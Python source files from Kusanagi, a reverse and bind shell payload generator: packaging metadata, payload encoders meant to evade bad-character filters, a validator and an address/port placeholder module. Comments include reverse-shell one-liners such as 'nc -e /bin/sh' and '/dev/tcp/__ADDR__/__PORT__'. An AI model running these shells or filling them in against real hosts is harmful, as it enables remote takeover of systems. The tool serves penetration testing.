            "files/obfuscators/cmd.yml",
            "files/payloads/cmd/bash.yml",
            "files/payloads/cmd/nc.yml",
        ],
    },
    entry_points={
        "console_scripts": [
            # cmd = package[.module]:func
            "kusa=kusanagi:main",
        ],
    },
    install_requires=requirements,
    description="Kusanagi is a bind and reverse shell payload generator with obfuscation and badchar support.",
    license="MIT",
    long_description=long_description,
    long_description_content_type="text/markdown",
    keywords=["payload", "bind shell", "reverse shell", "generator", "shell", "kusanagi"],
    author="cytopia",
    author_email="cytopia@everythingcli.org",
    url="https://github.com/cytopia/kusanagi",
    project_urls={
        "Source Code": "https://github.com/cytopia/kusanagi",
        "Bug Tracker": "https://github.com/cytopia/kusanagi/issues",
    },
    python_requires=">=3.6",
    classifiers=[
        # https://pypi.org/classifiers/
        #
        # How mature is this project
        "Development Status :: 3 - Alpha",
        # How does it run
        "Environment :: Console",
        # Indicate who your project is intended for
        "Intended Audience :: Developers",
        "Intended Audience :: Information Technology",
        "Intended Audience :: Science/Research",
        "Intended Audience :: System Administrators",
        # License
        "License :: OSI Approved :: MIT License",
        # Where does it run
        "Operating System :: OS Independent",
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: Implementation :: CPython",
        "Programming Language :: Python :: Implementation :: PyPy",
        # Project topics
        "Topic :: Internet",
        "Topic :: Security",
        "Topic :: System :: Shells",
        "Topic :: System :: Systems Administration",
        "Topic :: Terminals",
        "Topic :: Utilities",
        # Typed
        "Typing :: Typed",
    ],
)



"""Encoder module."""
from typing import Dict, List, Any
from argparse import ArgumentTypeError

import os
import pathlib
import base64
import re
import html
import urllib.parse


AVAILABLE_ENCODERS = {
    "url": "URL encodes the data.",
    "urlplus": "URL encodes the data and converts spaces to '+' signs",
    "html": "Convert all applicable characters to HTML entities",
    "hex": "Convert to hex, prepended with \\x",
    "hexesc": "Convert to hex, prepended with escaped \\\\x (double slash)",
    "hex0x": "Convert to hex, prepended with 0x",
    "base64": "base64 encoding",
    "base64pad": "base64 encoding with padding to achieve: [A-Za-z0-9+]",
    "2xbase64pad": "Double base64 encoding with padding to achieve: [A-Za-z0-9]",
}


# --------------------------------------------------------------------------------------------------
# Public functions
# --------------------------------------------------------------------------------------------------
def encode(data: str, encoder_name: str) -> str:
    """Encodes a string with the given encoder name."""
    func = globals()["_encode_" + encoder_name]
    data = func(data)
    return data


# --------------------------------------------------------------------------------------------------
# Public argparse functions
# --------------------------------------------------------------------------------------------------
def argparse_encoder_validate(encoder: str) -> str:
    """Argparse choice function to select encoders."""
    if encoder not in AVAILABLE_ENCODERS:
        raise ArgumentTypeError("%s is an invalid encoder." % encoder)
    return encoder


def argparse_encoder_list() -> None:
    """List available encoder for argument --list-encoders."""
    print("Available encoders:\n")
    print("{:<12}| {}".format("NAME", "DESCRIPTION"))
    print("{}|{}".format("-" * 12, "-" * 12))
    for encoder in AVAILABLE_ENCODERS:
        print("{:<12}| {}".format(encoder, AVAILABLE_ENCODERS[encoder]))


# --------------------------------------------------------------------------------------------------
# Available Encoders
# --------------------------------------------------------------------------------------------------


def _encode_url(data: str) -> str:
    """URL encodes the string."""
    return urllib.parse.quote(data, safe="")


def _encode_urlplus(data: str) -> str:
    """URL encodes the string and converts spaces to a '+' sign."""
    return urllib.parse.quote_plus(data, safe="")


def _encode_html(data: str) -> str:
    """Html entity encodes the string."""
    return html.escape(data)


def _encode_hex(data: str) -> str:
    temp = []
    for char in data:
        temp.append(hex(ord(char)).replace("0x", "\\x"))
    return "".join(temp)


def _encode_hexesc(data: str) -> str:
    temp = []
    for char in data:
        temp.append(hex(ord(char)).replace("0x", "\\\\x"))
    return "".join(temp)


def _encode_hex0x(data: str) -> str:
    temp = []
    for char in data:
        temp.append(hex(ord(char)))
    return "".join(temp)


def _encode_base64(data: str) -> str:
    """Base 64 encodes a string."""
    ebytes = base64.b64encode(data.encode("utf-8"))
    estring = str(ebytes, "utf-8")
    return estring


def _encode_base64pad(data: str) -> str:
    """Base64 encodes with space padding to ensure output only contains [a-zA-Z0-9+]."""
    pattern = r"[^a-zA-Z0-9\+]"
    regex = re.compile(pattern)
    while True:
        ebytes = base64.b64encode(data.encode("utf-8"))
        estring = str(ebytes, "utf-8")
        if not regex.findall(estring):
            break
        # Pad with trailing space and try again to eliminate base64 pad chars
        data = data + " "

    return estring


def _encode_2xbase64pad(data: str) -> str:
    """Base64 encodes twice with space padding to ensure output only contains [a-zA-Z0-9]."""
    pattern = r"[^a-zA-Z0-9]"
    regex = re.compile(pattern)
    while True:
        # First run
        ebytes = base64.b64encode(data.encode("utf-8"))
        estring = str(ebytes, "utf-8")

        # Second run
        ebytes = base64.b64encode(estring.encode("utf-8"))
        estring = str(ebytes, "utf-8")

        if not regex.findall(estring):
            break
        # Pad with trailing space and try again to eliminate base64 pad/special chars
        data = data + " "

    return estring



"""This file holds the obfuscator yaml validator/definition template."""

VALIDATOR = {
    "type": {
        "type": str,
        "required": True,
        "allowed": "^(cmd|code|file)$",
        "childs": {},
    },
    "version": {
        "type": str,
        "required": True,
        "allowed": "^([0-9]+\\.[0-9]+\\.[0-9]+)$",
        "childs": {},
    },
    "obfuscators": {
        "type": list,
        "required": True,
        "childs": {
            "name": {
                "type": str,
                "required": True,
                "allowed": "^(.+)$",
                "childs": {},
            },
            "desc": {
                "type": str,
                "required": True,
                "allowed": "^(.+)$",
                "childs": {},
            },
            "meta": {
                "type": dict,
                "required": True,
                "childs": {
                    "authors": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "created": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]{4}-[0-9]{2}-[0-9]{2})$",
                        "childs": {},
                    },
                    "modified": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]{4}-[0-9]{2}-[0-9]{2})$",
                        "childs": {},
                    },
                    "version": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]+\\.[0-9]+\\.[0-9]+)$",
                        "childs": {},
                    },
                },
            },
            "filters": {
                "type": dict,
                "required": True,
                "childs": {
                    "shells": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "commands": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "encoders": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                },
            },
            "payload": {
                "type": str,
                "required": True,
                "allowed": "^(.+__PAYLOAD__|__PAYLOAD__.+|.+__PAYLOAD__.+)$",
                "childs": {},
            },
        },
    },
}



"""Placeholder module - ensures that __ADDR__ and __PORT__ are replaced accordingly."""
from typing import Dict, List, Union, Any


class Placeholder(object):
    """Replaces the __ADDR__ and __PORT__ placeholders on an item."""

    # --------------------------------------------------------------------------
    # Public functions
    # --------------------------------------------------------------------------
    @staticmethod
    def parse(item: Dict[str, Any], addr: str, port: str) -> Dict[str, Any]:
        """Replaces the __ADDR__ and __PORT__ placeholders on an item."""
        # item = {
        #   name: payload-name
        #   desc: payload-desc
        #   filters: {}
        #   variables: []
        #   variations: []
        #   payload: nc -e /bin/sh {ADDR} {PORT}
        # }

        # payload: sh>&/dev/tcp/__ADDR__/__PORT__ 0>&1
        payload = Placeholder.__replace(item["payload"], addr, port)

        # variables:
        #   - name: shell
        #     filters:
        #       shell: {VAR:shell}
        #     values:
        #       - val1
        #       - val2
        variables = Placeholder.__replace_variables(item["variables"], addr, port)

        # variations:
        #   - name: shell
        #     filters:
        #       obfuscated: true
        #     payload: $(echo {PAYLOAD}|base64)|{VAR:shell}
        variations = Placeholder.__replace_variations(item["variations"], addr, port)

        # Resemble
        item["payload"] = payload
        item["variables"] = variables
        item["variations"] = variations
        return item

    # --------------------------------------------------------------------------
    # Private functions
    # --------------------------------------------------------------------------
    @staticmethod
    def __replace_variables(
        variables: List[Dict[str, Any]], addr: str, port: str
    ) -> List[Dict[str, Any]]:
        """Replaces the __ADDR__ and __PORT__ placeholders."""
        # variables:
        #   - name: shell
        #     filters:
        #       shell: {VAR:shell}
        #     values:
        #       - val1
        #       - val2
        for i in range(len(variables)):
            # Replace anything in name
            variables[i]["name"] = Placeholder.__replace(variables[i]["name"], addr, port)

            # Replace anything in filters values
            for fname, fvalue in variables[i]["filters"].items():
                variables[i]["filters"][fname] = Placeholder.__replace(fvalue, addr, port)

            # Replace anything in variable values
            for val in range(len(variables[i]["values"])):
                variables[i]["values"][val] = Placeholder.__replace(
                    variables[i]["values"][val], addr, port
                )
        return variables

    @staticmethod
    def __replace_variations(
        variations: List[Dict[str, Any]], addr: str, port: str
    ) -> List[Dict[str, Any]]:
        """Replaces the __ADDR__ and __PORT__ placeholders."""
        # variations:
        #   - name: shell
        #     filters:
        #       obfuscated: true
        #     payload: $(echo {PAYLOAD}|base64)|{VAR:shell}
        for i in range(len(variations)):
            # Replace anything in name
            variations[i]["name"] = Placeholder.__replace(variations[i]["name"], addr, port)

            # Replace anything in filters values
            for fname, fvalue in variations[i]["filters"].items():
                variations[i]["filters"][fname] = Placeholder.__replace(fvalue, addr, port)

            # Replace variation payload
            variations[i]["payload"] = Placeholder.__replace(variations[i]["payload"], addr, port)

        return variations

    @staticmethod
    def __replace(
        data: Union[str, bool, List[str]], addr: str, port: str
    ) -> Union[str, bool, List[str]]:
        """Replaces the __ADDR__ and __PORT__ placeholders on list or string."""
        if isinstance(data, str):
            data = data.replace("__ADDR__", addr)
            data = data.replace("__PORT__", port)
        if isinstance(data, list):
            for index in range(len(data)):
                data[index] = data[index].replace("__ADDR__", addr)
                data[index] = data[index].replace("__PORT__", port)
        return data



"""This file defines all module wide default values."""


# Default remote settings
DEF_PORT = 4444


# Available templates
DEF_TEMPLATES = [
    "reverse",
    "bind",
]


# Credits
DEF_BIN = "kusa"
DEF_NAME = "kusanagi"
DEF_DESC = (
    "Kusanagi is a bind and reverse shell payload generator with obfuscation and badchar support."
)
DEF_VERSION = "0.0.2"
DEF_AUTHOR = "cytopia"
DEF_GITHUB = "https://github.com/cytopia/kusanagi"


# List of common badchars
BADCHARS = [
    "!",
    "",
    "#",
    "$",
    "%",
    "&",
    "'",
    "(",
    ")",
    "*",
    "+",
    ",",
    "-",
    ".",
    "/",
    ":",
    ";",
    "<",
    "=",
    ">",
    "?",
    "@",
    "[",
    "\\",
    "]",
    "_",
    "`",
    "{",
    "|",
    "}",
    "~",
    '"',
]
